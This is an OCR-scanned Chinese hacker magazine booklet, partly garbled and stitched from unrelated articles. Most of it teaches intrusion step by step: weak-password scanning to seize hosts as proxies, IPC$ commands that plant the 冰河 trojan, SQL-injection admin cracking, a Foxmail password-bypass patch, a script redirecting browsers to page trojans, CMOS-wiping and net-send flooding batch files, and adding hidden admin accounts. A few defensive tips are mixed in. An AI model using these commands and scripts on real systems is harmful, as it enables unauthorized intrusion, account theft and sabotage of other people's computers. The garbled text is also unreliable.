说管理员登录后却锁定了主机,或者正在运行屏
幕保护程序,这就不太好判断了。有矛必有盾,我
们既然能通过各种方式判定管理员是不是在线,
管理员也能通过这样的途径知道自己是否被入侵,
从而尽快地查出入侵者。所以请广大的黑客爱好
者不要以身试法,入侵国内主机。
计算机用户名客户类型打开空闲时间
LINYUN Windows 20002195 000:08:47
14
6. 全球IP地址分配表
这个工具对于高手来说是不必要的。但是我
们主要的目标是国外的主机,而很多以前没有做
过跳板的初学者网友对国外主机IP的分布不是很
了解,因此可以通过全球IP地址分配表来了解IP分
布情况。并以此作为我们选定所要扫描的IP域的主
要根据,这样就节省了用"追捕”软件查找IP的实
际所在地的时间了。
入侵思路:
1. 先在自己的机器上打开全球IP地址分配表,
选取一个IP区域。
2.用Superscan扫描选定的IP区域,找到其中
一个IP很集中的区域,然后放到x-scan进行漏洞
扫描(因为是面对以前没有做过跳板的网友,所以
这里只介绍用NT弱密码制作跳板),找到若干个有
弱密码的IP。
3.通过弱密码登录肉鸡,把sksockserver.exe上
传到目标主机上,然后远程启动sksockserver。这
样,跳板就做好了。
具体步骤:
1. 首先,我们选择某段IP,比如:x.85.0.0~
x.85.50.255,将扫描起始IP与结束IP放在Superscan
搜索框里面去,再把Superscan的扫描端口设置为
80,点击"确定”后开始扫描。这时,在下面的列
表框里面,会出现一大批的活跃IP。比如x.85.0.
0~x.85.40.255。
2. 随便选一段不太长的IP段,如x.85.0.0~
x.85.5.255。因为我们马上要用X-scan对它们进
行扫描,而X-scan扫描速度并不是很快,如果IP
段过长或IP地址过多的话,会降低扫描效率,并有
可能使X-scan出现误报。
3. 选择好后IP段后就可以用X-scan扫描了。
在"设置”菜单里,先选"扫描模块”,选择"开
放端口”和"NT 弱密码”两个选项,在"扫描参
数”里,填上我们刚才选定的IP范围:x.85.0.0~
x.85.5.255,接着将"端口相关设置”里的其他端
口去掉,只留下80,3389 两个端口,其他设置默
认。然后就开始搜索,这大概需要花8~9 分钟的
时间(因为X-scan虽然简单,但是速度慢),搜索
完成后看看搜索结果,你会惊喜地发现许多机器
存在弱密码,可以用来作肉鸡。但是需要注意的
是,X-scan 会有一些误报,大家一定要有耐心去
试啊。
4. 我们选择一个主机为弱密码的IP地址,比
如:x.x.0.14。接下来就是用流光验证它到底接不
接受远程连接,密码正不正确。打开流光,选择"工
具→NT管道远程命令”,出现对话框,把刚才的IP、
用户名和密码都填进去,然后按回车键。在界面上
"NTCMD”提示符后面输入"CMD”,再次按回车键
后屏幕上出现了"C:\WINNT\SYSTEM32”的提示
符。这表明刚才的用户名和密码是正确的,这台机
器已经基本是你的了。
5 . 进去之后就可以做跳板了。要把
sksockserver.exe放到肉鸡上,这样才能启动远程服
务,让这台肉鸡成为跳板。打开肉鸡上的cmd命令
框,在命令提示符下输入如下命令:
C:\> net use password/
user:username
其中"username”和"password”分别是你探
测出来的用户名和密码。当系统提示"命令成功完
成”后,就说明IPC$ 远程连接成功建立了。然后
输入以下命令:
C:\>copy csksockserver.exe .
14\admin$
成功后系统会提示:"成功复制一个文件”。这
样我们就成功地把sksockserver.exe传到了目标主机上。
6. 接下来的任务就是让它远程启动了。再次
打开流光,在"NTCMD”里键入"CMD”,之后在
提示符下输入如下命令:
csksockserver –install
(系统提示:snake sockproxy service installed)
csksockserver –config port 1949
(端口可由自己决定,这里的1949 是随便选
15
黑客基本技巧
的,输入完按回车键后系统提示:the port value
have set to 1949 )
csksockserver –config starttype 2
(系统提示:the starttype have set to 2---auto
cnetstartskserver)
这个时候远程登录服务已经成功启动,这台
机器已经成为你的跳板了。
当然,并不是找到肉鸡后就万事大吉了。为了
更好地利用找到的肉鸡,我们还有很多工作要做,
比如清理我们的入侵痕迹、创建一个自己的admin
权限用户名以及增加形化远程登录功能等。下
面简单介绍一下这些后续工作。
做后续工作除了要使用到前面介绍的工具之
外,还要用到其它三个工具:
1.Sockscap:强大的socks代理调度软件。
2.sksockserver GUI:snake的代理跳板GUI(
形界面程序)。
3.mstsc:微软terminal service(终端服务)的
客户端程序。用于登录3389 肉鸡。有了它,我们
就可以象控制自己的机器一样控制终端服务器,
做我们想做的事情了。
开了3389 服务后,如果要把这台肉鸡当成自
己的机器来使用,就肯定要有自己的登录名。否则
每次总是用别人的,那还怎么叫是自己的机器?
我们现在来给自己添加一个用户名,并把自己提
升成为root权限,这样我们就可以在肉鸡上做任何
事情了。打开流光,选择"工具→ NT 管道命令”,
填上刚才得到的用户名跟密码,点击"确定”后进
入NTCMD 界面,在提示符下键入"CMD”,连接成
功以后在系统提示符下进行如下操作:
C:\> net user admin add(添加一个用户名为
admin的用户。)
C:\> net user admin shonline788(使得admin
的密码是shonline788。)
C:\> net localgroup administrators admin add
(把用户admin提升为administrator即管理员身份)
这样我们就成功地在这台机器中取得了root权
限,可以作任何事情了。
下一步就要用上我们刚才准备的这些工具了。
其中前面两个工具Sockscap和sksockserver GUI是附
属的工具,它们用来配合实现跳板的使用,可以隐
藏我们的入侵痕迹。在网上找几个Socks 代理,把
Sockscap和sksockserver GUI设置好,再把mstsc的
标拖到Sockscap里去。之后双击mstsc的标,在
其中填上刚才找到的肉鸡的IP地址:x.x.0.14,按
回车键进行连接。成功以后,会出现一个跟Windows
2000一样的蓝色登录界面,在里面填上我们
刚才添加的用户名与密码,敲回车键登录。登录成
功以后就会出现该主机的形界面,这个时候你就
可以象操作自己的机器一样,操作这台肉鸡了。
在Windows XP 和Windows 2000 系统中有一
个大家不常用,但是功能强大的命令——syskey命
令。这个命令可以有效地增强你的系统安全性。也
许你要说进入Windows XP 或Windows 2000 的时
候需要输入账户和密码,这样已经够安全了。但其
实只要你的电脑是多人使用,其他人完全可以通过
各种方法来进入系统,利用种种漏洞来获取管理员
权限。而有了用syskey制作的加密软盘,你就可以
完全放心使用Windows 2000 和Windows XP 了。
下面我们来看看syskey命令的用法。
一、双重密码保护的设置
1.在开始菜单的"运行"中输入"syskey",点
击确定。
Windows XP 超强syskey 命令
16
3
2
1
2.这个界面所提到的账户数据库便是NTFS加
密的原理所在,对于一般用户,不需要了解原理,
只要会用就行。下一步点击" 更新"。
3.这里我们选择密码启动,输入一个密码,然
后点击确定。这样做将使Windows在启动时需要多
输入一次密码,起到了2次加密的作用。操作系统
启动时在往常我们输入用户名和密码之前会出现窗
口提示"本台计算机需要密码才能启动,请输入启
动密码"。这便是我们刚刚创造的双重密码保护。
二、密码软盘的制作
1.如果我们选择" 在软盘上保存启动密码",
这样将生成一个密码软盘,没有这张软盘,谁也别
想进入你的操作系统。当然,如果你之前设置了
syskey系统启动密码,这里还会需要你再次输入那
个密码,以获得相应的授权,这有点类似我们在更
改QQ 密码的时候,必须知道原来的密码一样。
2.然后系统会提示你在软驱中放入软盘,当密
码软盘生成后会出现提示。
3.然后我们再次启动系统,这时系统会提示你
插入密码软盘,如果你不插入软盘就点击确定,系
统是不会放行的。除此之外,插入的密码软盘还可
以根据不同账户输入不同的密码。同时如果你愿意,
密码软盘中的密匙文件可以复制到其他软盘上。
三、去除密码软盘
假如有一天,你对操作系统的安全性要求不
那么高了,或者你厌烦了每次进入系统都需要插
入软盘,怎么办?选择"在本机上保存启动密码"
就可以了,当然,进行这一步操作你必须要有存有
密匙的软盘,这与制作密码软盘时要求输入授权
密码是一个道理。
17
黑客基本技巧
很多人认为txt文件没有危险,因此在网上遇
到陌生人发来的txt文件时往往麻痹大意。很多黑
客利用这一点,将各种有害文件伪装成txt文件,以
达到不可告人的目的。下面我们就来一一揭开这
些有害文件伪装的外衣。
一、隐藏扩展名的txt 文件
假如你收到这样的邮件附件:"QQ 靓号放送.
txt”,你是不是认为它肯定是纯文本文件?不一
定。它的实际文件名可能是"QQ 靓号放送.txt.
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”。
其中{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
揪出伪装成txt 的有害文件
是注册表里HTML文件关联的意思。但是储存为文
件名的时候它并不会显现出来,这个文件实际上
等同于QQ靓号放送.txt.html。如果你双击它,以
为会打开记事本,结果它却调用了HTML 来运行,
那就只有天知道它要做什么了,删除文件?格式
化硬盘?都有可能。
识别及防范方法
1.这种txt文件显示的并不是文本文件的标,
而是未定义文件类型的标志,这是区分它与正常
txt文件的最好方法。
2.另一个识别方法是在"按Web页方式”查看
时在"我的电脑”左面会显示出其文件名全称(如
大家都知道IE的收藏夹有个导出功能,IE收藏
夹导出的收藏夹网页都有个共同特点——页面的
标题都是"bookmarks”。正好,百度搜索有一个
"title”语法功能,利用该功能我们可以轻易地搜寻
到互联网上所有的收藏夹网页,看看别人都喜欢
哪些站点。
方法一:直捣黄龙
"title”语法的用法很简单,只需要用"A title:
bookmarks ”为关键字在百度中搜索即可。"A”为
其中一个关键字。比如如果你想搜索"在线听歌”
的网站,那么可以用"歌曲title:bookmarks”进行
搜索。
方法二:顺藤摸瓜
除此之外,我们还可以来招"顺藤摸瓜”,通
过某个不错的站点来获得更多同类的优秀站点。
比如,有个叫"小木虫”的网站(http://www.
用百度偷窥别人收藏夹
emuch.net),笔者觉得它还不错,所以想看看收藏
这个站点的人还收藏了些什么好站。只需要在百
度中用"小木虫title:bookmarks”为关键字进行搜
索即可。需要注意的是,这里的"小木虫”必须是
网站标题的一部分,比如百度站点的标题就是"百
度——全球最大中文搜索引擎”,那么我们就可以
用"中文搜索引擎title:bookmarks”来搜索那些收
藏了百度的人还收藏了什么网站。
18
。这里再次提醒你,注意你收到的邮件中附
件的文件名,不仅要看显示出来的扩展名,还要注
意其实际显示的标是什么。
3.对于附件中看起来像是txt的文件,可以将
它下载后用鼠标右键选择"用记事本打开”,这样
会很安全。
二、恶意碎片文件
另一类可怕的txt文件是一种在Windows中被
称作"碎片对象”(扩展名为shs)的文件,它一般被
伪装成文本文件通过电子邮件附件来传播,比方
说形如:QQ号码放送.txt.shs的文件。由于真正的
后缀名shs不会显示出来,如果在文件中含有诸如
"format”之类的命令将非常可怕。另外,它具有很
强的隐蔽性,这是因为:
1.碎片对象文件的默认标是一个和记事本文
件相类似的标,很容易被误认为是一些文本的
文档,用户对它的警惕心理不足。
2.在Windows 的默认状态下,"碎片对象”文
件的扩展名是隐藏的,即使你在"资源管理器”→
"工具”→"文件夹选项”→"查看”中,把"隐
藏已知文件类型的扩展名”前面的"√”去掉,shs
也还是隐藏的,这是因为Windows 支持双重扩展
名,如"QQ号码放送.txt.shs”显示出来的名称永
远是"QQ 号码放送.txt”。
3.你用任何杀毒软件都不会找到这个文件的
一点问题,因为这个文件本身就没有病毒,也不
是可执行的,而且还是系统文件。你会怀疑这样
的文件吗?
防范方法
在注册表编辑器的"HKEY_CLASSES_ROOT
\ShellScrap”分支下,有一个名称为"NeverShowExt”
的键,它是导致shs文件扩展名无法显示的罪魁祸
首。删除这个键值,你就可以看到shs文件扩展名了。
另外,还可以更换"碎片对象”文件的默认
标。打开"资源管理器”→"查看”→"文件夹选
框”→"文件类型”→"已注册的文件类型”→"碎
片对象”,单击"编辑”,在"编辑文件类型”对话
框中单击"更改标”按钮。打开C:/WINDOWS/
SYSTEM/Pifmgr.dll,选择一个新标即可。
三、改头换面的Outlook 附件
除了上面所说的两类危险的txt文件外,还有
一种改头换面的Outlook邮件附件。它看似txt文
件,其实是exe文件。
当你用Outlook 2000收到邮件时,它可能会显
示这是一个带附件的邮件,双击打开时,Outlook
会提示:部分对象携带病毒,可能对你的计算机造
成危害,因此,请确保该对象来源可靠。这说明该
附件有问题。
识别方法
尽管这种文件的迷惑性极大,但是仍然会露
出一些马脚:
1.它其实是一个OLE对象,并不是附件,它的
选择框不同于附件的选择框。点击鼠标右键出现
的菜单与正常附件的菜单不同。
2.双击打开它时,安全提示与附件的安全提示
不同,这点非常重要。这时,应该选择"NO”,然
后点击鼠标右键,选择"编辑包”。当提示"是否
信任该对象”时,选择"YES”。这时在对象包装程
序的右边内容框中,将现出该文件的原形。
3.因为它不是附件,在选择"文件”→"保存
附件”时并无对话框出现。
4.由于并不是所有的邮件收发软件都支持对象
嵌入,所以这类邮件的格式不一定被某些软件识
别。但是Outlook的使用面很广,尤其是在比较大
19
黑客基本技巧
网络电话(视频电话、宽带电话或视频宽带电
话)又叫VoIP,即Voice over Internet Protocol的缩
写,是基于IP网络的语音传输技术。网上有许多的
网络电话软件,通过这些网络电话软件,可以免费
打电话。下面推荐一款网络电话软件TelTel。
进入软件官方网站http://www.teltel.com/,
单击页面右上方的"简体中文”超链接,就可进入
TelTel的简体中文页面(1)。单击"立即下载(完
全免费)”按钮,进入TelTel下载页面。单击"大陆
网站下载”超链接即可开始下载TelTel网络电话。将
TelTel下载并安装完成后,就可以使用TelTel了。
单击"登录”按钮,出现"登录”对话框,如
果你以前使用过TelTel并注册了用户,可在此直接
输入已注册用户的电子邮件和密码。如果是新用
免费拨打任意电话
户,则单击
"注册”按钮
进行注册,
在出现的
"建立账户”
对话框中输
入你的电子
邮件地址
(2)。然后
单击"下一
步”按钮,出
现"设定个
人信息”对
话框,在此
1
我们知道对文件加密有许多种方式,例如用第
三方加密软件。其实用系统漏洞也能加密文件。
Windows系统下不能够以一些字样来命名文件
或文件夹,包括:"aux”、"com1”、"com2”、"prn”、
"con”和"nul”等,因为这些名字都属于设
备名称,等价于一个DOS 设备,如果我们把
文件或文件夹命名为这些名字,Windows 就会误
以为发生重名,提示"不能创建同名的文件”。我
们可以利用这漏洞来加密文件。
假如要把C盘的1.txt加密。可以选择桌面右
用漏洞加密文件
下角的"开始”-"运行”,在运行框里输入"cmd”
后点击"确定”,打开cmd 命令框。输入"copy c:
\1.txt ”(或者其它几个名字都可
以)。这样,在C盘下就生成了一个名字为aux.txt
的文本文档。但是这个文档在Windows 界面下是
打不开的,因此起到了加密的作用。
要打开文件也很简单,在cmd 命令框里输入
"\\.\c:\aux.txt”即可。要删除文件则输入"del
”。
的、有自己Mail服务器的公司,所以还是有必要提
醒大家小心嵌入对象。不光是Outlook,Word、Excel
等支持嵌入对象的软件也可以让嵌入对象改头换
面迷惑人。
上面介绍了三种伪装成txt文件的有害软件。
其实只要我们在上网时足够小心,按本文所说的
防范方法去做,就不会有危险了。
20
输入密码及显示的姓名。单击"下一步”按钮,出
现"开始”对话框,提示用户注册成功,TelTel已
经寄出封电子邮件到你的注册邮箱中。单击"完
成”按钮,登录到你的注册邮箱中,打开TelTel寄
给你的邮件,根据提示单击链接来激活账户,然后
就可使用TelTel软件了。
TelTel对拨打固定电话、小灵通及手机的用户
做了一定的限制,你的TelTel中必须有3个或3个
以上的好友才可拨打电话,并且添加的好友越多,
则越有机会打通电话。因此,用户在使用
:听人说有经验的黑客仅仅通过一个ping
命令就可以判定远程主机的操作系统。这是怎么
回事?怎样实现?
:在ping主机后可以通过TTL返回值大体
判定。举例如下:
TTL=107(Windows NT)
TTL=108(Windows 2000)
TTL=127 或128(Windows 9x)
TTL=240或241(Linux)
TTL=252(Solaris)
新手入侵的几个问题
TTL=240(Irix)
大家可以在平时多总结一下,但也注意不要
过于迷信,因为一个聪明的管理员会手动修改TTL
值以迷惑入侵者。
:老是见到shell这个名词,这个shell是什
么?还有什么是exploit?
:shell代表的是用户和操作系统"交流”的
接口,就像Windows 2000中的cmd命令框。shell
的另一种解释是Unix系统下的一种脚本编程语言。
exploit一般解释为"溢出”或"漏洞”。我个人认
2
为解释成"溢出”更确切一些。
:用3389终端服务控制肉鸡好爽,可是对
方的管理员如果在主控台的话,会不会看到我对
他系统的控制?
:你的控制操作是在后台运行的,表面上
是察觉不到的。但是管理员可以通过
"Alt+Ctrl+Del”组合键查看到你的控制进程,然后
kill掉你的ID或者发个对话框过来吓你一跳,所以
最好是确定管理员不在线的时候再进行控制。
:我已拿到一台Windows 2000的admin权
限,但是只能通过telnet登录控制。我若想用终端
控制它该怎样做?
:Windows 2000自带一个无人职守的安装
工具:sysocmgr.exe。你可以telnet进入主机后再在
命令行下输入:
C:\>echo [Components] >c:\hackart
C:\>echo TSEnable = on >>c:\hackart
C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /
u:c:\hackart /q /r
过一会终端服务就会自动安装完毕。
"TSEnable=on”的意思是开启终端服务。最后一行
的/r参数是决定服务器是否重新启动。若去掉/r
参数将自动重启服务器。重新启动后终端服务也
会自动启动。详细参数设定请参考MSDN 帮助。
:我可以用Windows 98 入侵Windows
2000 或Windows NT 吗?
:当然可以!也可以入侵Unix/Linux,前提
是你要有跳板才行。因为Windows 98对网络的支
持较差,没跳板的话入侵起来很费力。
:像我这样的菜鸟怎样才能逐步提高自己
的入侵水平?
:多看看入侵教程,先从IIS系列入侵开
始,逐步向入侵Solaris、Linux、Free Bsd、Irix等进
化。不要急,慢慢来。
:我想知道入侵的详细步骤,因为有许多
时候我感到无从下手。
:入侵大体步骤如下:
1. 扫描目标主机( 找个好用的扫描器, 推荐
namp)。检查开放的端口,看哪个可以利用。搜集
目标服务器信息很重要,这可以保证"对症下药”
地进行后面的入侵工作。
2.看是否存在脆弱账号和密码,以及服务软件
漏洞,如Wu-FTP 漏洞等等。
3.若目标主机固若金汤,而你又有钱的话,可
以试试暴力破解。
4.如果对方只开放80 端口,你可以尝试探测
一下IIS或CGI漏洞等。
5.通过前面找到的漏洞进入对方主机,然后留
后门,清除日志等等。
:像我这样的初学者用什么扫描工具最好?
:流光、X-scan、SuperScan等等。
:我对SUN OS 入侵比较感兴趣,我想了
解一下sunrpc远程溢出漏洞及相对应的版本。
:rpc.ttdbserverd:Solaris 2.3,2.4,2.5,
2.5.1,2.6
rpc.cmsd:Solaris 2.5,2.5.1,2.6,7
sadmind:Solaris 2.6,7
snmpXdmid:Solaris 7,8
本地漏洞:lpset:Solaris 2.6,7
当你net start termservice失
败后可尝试用此方法。
提示
3
黑客基本技巧
作为一个初级黑客,我们首先要了解的是一
般的入侵步骤。一般入侵步骤分为三步:
1.扫描目标主机并分析扫描信息。比如:探测
开放的端口、获得服务软件及版本、探测漏洞等等。
2.利用扫描找到的漏洞,探测并获取系统帐号
或密码。
3.通过系统帐号或密码获得权限,然后对入侵
的主机进行操作。
下面从使用工具的角度讲解两个实际入侵的
例子。例子不涉及任何高深知识,但从中可以看出
入侵的一般步骤。
一、入侵单机-普通攻击
操作系统:Windows NT 系统。
工具:
1.shed.exe:shed.exe是一款用于网上查共享
资源的工具。它的查找速度快,可以查到很多服务
端的共享文件。不过其中有些ip在浏览器中无法访
问,这是因为它们也包含了个人上网的ip。
2.流光2000:一些网站和网吧的服务器目录
都是共享的,但是需要访问用户名和密码,否则会
出现访问不了或者权限不够的情况。这时候我们
可以用流光的ipc探测功能建立一个空对话,然后
再简单探测用户列表。如果遇到某些网管为了
方便把系统administrator账号设置得过于简单,便
可以抓到肉鸡了。
3.冰河8.4:在被入侵服务器端带宽很大的情
况下,使用冰河可以很快控制服务器,并且在几分
钟内就可以查到对方主机的主页所在位置。但是
如何上传并且控制它呢?这就要用到Windows 自
带的cmd.exe工具了。
4.cmd.exe:点击Windows桌面右下角"开始”
按钮,选择"运行”,在命令框里输入"cmd”后,
点击"确定”进入cmd.exe 的对话框。在cmd.exe
对话框中使用net命令,具体操作如下:
入侵的基本步骤介绍
第一步:输入"net use password
/user:username”
说明:以一个超级用户名与你想入侵的主机
建立联接,超级用户必须具有admin权限。这里的
"ip”输入要入侵主机的ip 地址,"username”与
"password”就是刚才用流光找到的超级用户的用
户名与密码。比如:"net use
juntuan/user:juntuan”。
第二步:输入"c o p y g - s e r v e r . e x e
”
说明:g-server.exe就是冰河的远程服务器端,
该命令将此文件拷贝到对方主机Window NT 系统
里的system32目录里。
第三步:"输入net time ”
说明:查看对方的服务器时间。之所以要查看
对方服务器时间,是因为不同机器上的系统时间
有差异,这里必须以对方的服务器时间为准。
第四步:at time g-server.exe
说明:这里的time就是对方的主机时间。该命
令的作用是在规定时间执行该程序。比如 a t
.*.*.* 19:55 g-server.exe,这样冰河就可
以在对方主机时间是19.55的时候控制该电脑了。
二、入侵网站—— SQL 注入攻击
工具:榕哥的SQL注入攻击工具包,在榕哥的
站点可以下载。这个工具包中有两个小程序:
"wed.exe”和"wis.exe”,其中"wis.exe”是用来
扫描某个站点中是否存在S Q L 注入漏洞的,而
"wed.exe”则是用来破解SQL注入用户名密码的。
两个工具的使用都非常简单,结合起来就可以完
成从寻找注入点到注入攻击成功的整个过程。
1.寻找SQL 注入点
"wis.exe”使用的格式如下:"wis.exe 网址”。
首先打开命令提示窗口,比如输入如下命令:
"wis.exehttp://www.xxx.com/”。在输入网址
4
时,前面的"http://”和最后面的"/”是必不可
少的,否则将会提示无法进行扫描。输入完毕后按
回车键,即可开始进行扫描了。从扫描结果中可以
看到,某些网站中存在着很多SQL注入漏洞。我们
可以随便挑其中一个,然后对它进行SQL注入,破
解出管理员的帐号。
2、SQL 注入破解管理员帐号
现在使用刚才下载的工具包中的"wed.exe”
程序,进入命令窗口中输入命令。命令格式为:
"wed.exe 网址”。需要注意的是,这次输入网址
时,最后面千万不要加上那个"/ ”,但前面的
"http://”还是必不可少的。输入后按回车键可以
看到程序运行的情况。可以看到程序自动打开了
工具包中的几个文件"C:\wed\wed\TableName.
dic”、"C:\wed\wed\UserField.dic”和"C:
\wed\wed\PassField.dic”,这几个文件分别用来破
解用户数据库中的字表名、用户名和用户密码所
需的字典文件。当然我们也可以用其它的工具来
生成字典文件,不过榕哥"黑客字典”已经足够强
大,不需要再去找其他工具了。
在破解过程中还可以看到"SQL Injection
Detected.”的字样,表示程序还会对需要注入破解
的网站进行一次检测,看看是否存在SQL 注入漏
洞,成功后才开始猜测用户名。
耐心等待一会后,就能获得数据库表名,然后
得到用户表名和字长,再检测到密码表名和字长,
最后用"wed.exe”程序进行用户名和密码的破解,
很快就得到了用户名和密码了。
3.搜索隐藏的管理登录页面
拿到了管理员的帐号后,还需要找到管理员
登录管理的入口才行。一般在网页上不会出现管
理员的入口链接,这时候还是可以使用"wis.exe”
程序。因为这个程序除了可以扫描出网站中存在
的所有SQL注入点外,还可以找到隐藏的管理员登
录页面。
管理员登录页面只可能隐藏在整个网站的某
个路径下。因此输入"wis.exehttp://www.xxx.
com/ /a”(http://www.xxx.com/ 为你要入侵
网站的网址),对整个网站进行扫描。依然要注意
扫描语句中网址的格式。按回车键后程序开始对
网站中的所有页面进行扫描,在扫描过程中找到
的隐藏登录页面会在屏幕上以红色显示出来。查
找完毕后,所有页面会以列表形式显示在命令窗
口中。
在浏览器中输入网址,出现了本来隐藏着的
管理员登录页面。输入用户名和密码,就进入到后
台管理系统了。
一、cmd 命令框下用IPC$ 登录肉鸡
的简单操作
用记事本建立一个名为login.bat文件,代码如下:
@net use %3 /u:"%2"
@echo
保存文件后,在cmd命令框里输入如下命令:
login.bat x.x.x.x user/password
其中"x.x.x.x”为肉鸡IP地址,"user”为肉
小黑客的九大贴身秘技
鸡admin 用户名,而"password”为密码。这样我
们以后每次用IPC$登录肉鸡就不用输入一大串的
命令了。
二、进入Foxmail 账户有妙招
在Foxmail中可以为账户加上访问密码,如果
想进入别人的信箱却不知道密码该怎么办呢?一
个众所周知的办法是:打开Foxmail文件夹下以账
5
黑客基本技巧
户名命名的任意一个文件夹,把里边一个名为
account.stg的文件复制到你想进入的账户目录里,
直接覆盖该目录下原来的account.stg文件。运行
Foxmail,就可以不需密码直接进入该信箱。但是
上面的方法并不隐蔽,因为对方下次使用信箱时
就会发现你破解了他的信箱。要想进入对方的信
箱而不被对方发现,可以使用下面这个办法:用16
进制文件编辑器UltraEdit打开Foxamil的主程序
Foxmail.exe文件,按组合键"Alt+F3”在查找框里
输入以下的代码"E8617EE4FF7515”,单击"确定”
开始后查找,找到后把其中的"7515”改为"9090”,
然后保存就可以了。再次运行Foxmail.exe后,就
可以随意进入设有密码的Foxmail邮箱了。该技巧
对5.0.500.0版本的Foxmail也有效。
三、利用vbs 脚本判断对方的IE 版本
做过网页木马的朋友都知道,针对不同版本
的IE,网页木马的制作方法也不相同,比方说针对
IE6.0版的网页木马制作方法与其它各个版本的就
不相同。因此我们在编制网页木马时,往往需要页
面具有自动判别对方IE版本的能力,以便根据对方
IE版本的不同,跳转到不同的网页木马页面。以下
一段vbs脚本可以帮助我们实现这个功能。
打开记事本,输入如下内容:
〈SCRIPT language=vbscript〉
if Instr(window.navigator.appversion,"MSIE 6.
0")>0 then
alert("浏览器:Internet Explorer 6.0")
window.location.href="http://IE6.0 网页木马
页面"
else
alert("浏览器:6.0版本以下")
window.location.href="http://IE6.0以下版网
页木马页面"
end if
〈/SCRIPT〉
这样,使用IE6.0的用户浏览了该页面后,会
自动跳转到"http://IE6.0网页木马页面”,不是
IE6.0的用户浏览后会自动跳转到"http://IE6.0以
下版网页木马页面”。当然,具体页面网址可根据
你设置的木马页面进行修改。
四、肉鸡ipc$ 打不开的解决办法
有些朋友反映通过telnet登录到对方的机器后
却不能打开ipc$,这该怎么办呢?可以按如下步骤
操作:
1.首先试试在cmd命令框里输入net share命
令,看ipc$服务能不能使用,如果不能使用,说明
对方没有安装文件和打印机共享服务,此时只能
放弃了。
2.如果ipc$服务可以使用,则输入net share
ipc$,看ipc$能不能打开。如果打不开就先输入net
stop server,然后输入net start server,这样就可
以知道ipc$能不能打开。
3.如果net stop server命令不能执行,则要先
关闭其附属进程,再关闭server的主进程,之后ipc$
多半可以连接上了。
4.如果ipc$还是连接不上,那么很可能是对方
开了防火墙,这时只能想办法杀掉防火墙的进程了。
五、用vbs 脚本结束进程
用记事本工具编写一个.vbs 文件,之后在
Windows2000下运行,就可以成功结束正在运行的
进程。
文件代码内容如下:
On Error Resume Next
strComputer="."Set objWMIService = GetObject
("winmgmts:" _
&& "{impersonationLevel=impersonate}!\\" &&
strComputer && "\root\cimv2")Set colProcessList
=objWMIService.ExecQuery _
("Select * from Win32_Process Where Name=*.
exe")For Each objProcess in colProcessList
objProcess.Terminate()Next
其中"*.exe”是你想要结束的进程,将它改
为你要结束进程的名即可。
6
六、利用批处理清除对方的CMOS 内容
如果你想清除对方电脑的CMOS 内容该怎么
办?方法有很多,其中利用批处理的方式是比较
另类的一招。具体办法是打开记事本,在文件中输
入如下内容:
Const ForAppending=8
Dim fso,x,y
Set fso=CreateObject("Scripting.
FileSystemObject")
Set x=fso.OpenTextFile("c:\autoexec.bat",
ForAppending, True)
Set y=fso.CreateTextFile("c:\1.txt", True)
x.WriteBlankLines(1)
x.Write"debug<1.txt"
x.WriteBlankLines(1)
y.WriteLine("o 70 10")
y.WriteBlankLines(1)
y.Write("o 71 10")
y.Close
x.Close
把上述内容保存为.bat文件,然后拷贝到对方
的电脑上运行即可。它的作用是向Autoexec.bat中
加入数据,创建一个文件,并向其中写入内容,使
对方机器在下次开机时调用debug清除掉CMOS设
置,包括CMOS 密码。其实,这与大家常用的清除
CMOS 密码的方法很相似,通常情况下清除CMOS
密码的方法是在cmd命令框下输入"debug”,按回
车键之后输入如下命令即可手工清除密码:
-o 70 10
-o 71 01
- q
七、利用批处理轰炸对方电脑
打开记事本,在里面输入如下内容:
@echo 正在轰炸中..
:start
@net send %1 %2
@if errorlevel 1 goto over
goto start
:over
@echo 发送失败:(
将其保存为文件名为"xxx.bat”的批处理文
件即可(xxx 可为任意文件名)。
之后在cmd 命令框里输入以下命令:
xxx.bat x.x.x.x message
其中"x.x.x.x”为要轰炸的IP地址,"message”
为轰炸时发送给对方的消息。
八、戏弄非法用户
为防止有人胡乱使用自己的电脑,我们可以
利用批处理文件来戏弄一下非法用户。用记事本
程序在Windows目录中建立一个Winstart.bat文件,
并在该文件中加入以下命令:
@echo off
echo non-system disk or disk error
choice/c:&&/n
上面代码中的"&&”为我们设置的密码,你
可以自行设置。这样重新启动计算机开机时显示
器上会显示"non-system disk or disk error”,而且
光标一直闪烁,给非法用户造成是Windows 死机
的假象。有时就连高手也会上当受骗。当我们要进
入系统时,只要输入"&&”即可。
九.我的电脑你别用
如果你不想让别人使用你的电脑,又不好意
思说,那该怎么办呢?也许你认为可以在CMOS中
设密码。但是如果是朋友向你询问密码,你好意思
不说吗?其实,我们可以用下面这个办法来欺骗
一下他的眼睛,使他以为电脑坏了,从而放弃使用
你电脑的念头。
方法是:进入cmd窗口,在里面输入:copy con
null.sys,之后按两次回车键,然后按"Ctrl+Z”组
合键或F6键,屏幕上会显示^z,再次按回车键,屏
幕上会显示"1 file(s) copied”,这样一个名为null.
sys 的空文件就建好了。现在,找到C盘根目录下
的config.sys文件(注意这个文件是隐藏属性,所
7
黑客基本技巧
当前最为常见的木马通常是基于TCP/UDP 协
议进行client端与server端之间的通讯的。既然要用
到这两个协议,就不可避免要在server端(就是被
种了木马的机器)打开监听端口来等待连接。例如
鼎鼎大名的冰河使用的监听端口是7626,Back
Orifice 2000则是使用54320等等。我们也可以通
过查看本机开放端口的方法来检查自己是否被种
了木马或其它hacker程序。以下是详细的介绍。
一、Windows本身自带的netstat命令
关于netstat命令,我们先来看看Windows帮助
文件中的介绍:
Netstat
显示协议统计和当前的TCP/IP 网络连接。该
命令只有在安装了TCP/IP 协议后才可以使用。
netstat [-a] [-e] [-n] [-s] [-p protocol] [-r]
[interval]
参数
-a
显示所有连接和侦听端口。服务器连接通常
不显示。
-e
显示以太网统计。该参数可以与-s 选项结
合使用。
-n
以数字格式显示地址和端口号(而不是尝试
查找名称)。
-s
查看自己开放的端口
显示每个协议的统计。默认情况下,显示TCP、
UDP、ICMP 和IP 的统计。
-p 选项可以用来指定默认的子集。
-p protocol
显示由protocol指定的协议的连接。protocol可
以是tcp或udp。如果与-s选项一同使用显示每个
协议的统计,protocol可以是TCP、UDP、ICMP或IP。
-r
显示路由表的内容。
interval
重新显示所选的统计,在每次显示之间暂停interval
秒。按"Ctrl+B”组合键停止重新显示统计。如
果省略该参数,netstat将打印一次当前的配置信息。
看完这些帮助文件,我们应该明白netstat命令
的使用方法了。现在就让我们现学现用,用这个命
